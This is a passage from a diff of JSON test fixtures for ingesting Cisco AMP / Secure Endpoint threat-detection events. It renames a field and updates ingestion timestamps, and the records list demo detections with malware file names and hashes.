                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1701,7 +1701,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.3372C1EDAB-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1788,7 +1788,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271930862Z",
+                "ingested": "2021-09-27T00:41:21.853414321Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1799,7 +1799,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.3372C1EDAB-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1875,7 +1875,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271932733Z",
+                "ingested": "2021-09-27T00:41:21.853416066Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1886,7 +1886,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.3372C1EDAB-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1973,7 +1973,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271934727Z",
+                "ingested": "2021-09-27T00:41:21.853417906Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1984,7 +1984,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.3372C1EDAB-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2060,7 +2060,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271936572Z",
+                "ingested": "2021-09-27T00:41:21.853419645Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2071,7 +2071,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.3372C1EDAB-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2158,7 +2158,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271938451Z",
+                "ingested": "2021-09-27T00:41:21.853421383Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2169,7 +2169,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.3372C1EDAB-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2241,7 +2241,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271940356Z",
+                "ingested": "2021-09-27T00:41:21.853423136Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2252,7 +2252,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -2339,7 +2339,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271942249Z",
+                "ingested": "2021-09-27T00:41:21.853424849Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2350,7 +2350,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.3372C1EDAB-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2422,7 +2422,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271944235Z",
+                "ingested": "2021-09-27T00:41:21.853426603Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2433,7 +2433,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -2501,7 +2501,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271946131Z",
+                "ingested": "2021-09-27T00:41:21.853428347Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2512,7 +2512,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -2590,7 +2590,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271948047Z",
+                "ingested": "2021-09-27T00:41:21.853430092Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2601,7 +2601,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2675,7 +2675,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271949953Z",
+                "ingested": "2021-09-27T00:41:21.853431831Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2686,7 +2686,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2764,7 +2764,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271951854Z",
+                "ingested": "2021-09-27T00:41:21.853433574Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2775,7 +2775,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2853,7 +2853,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271953745Z",
+                "ingested": "2021-09-27T00:41:21.853435305Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat 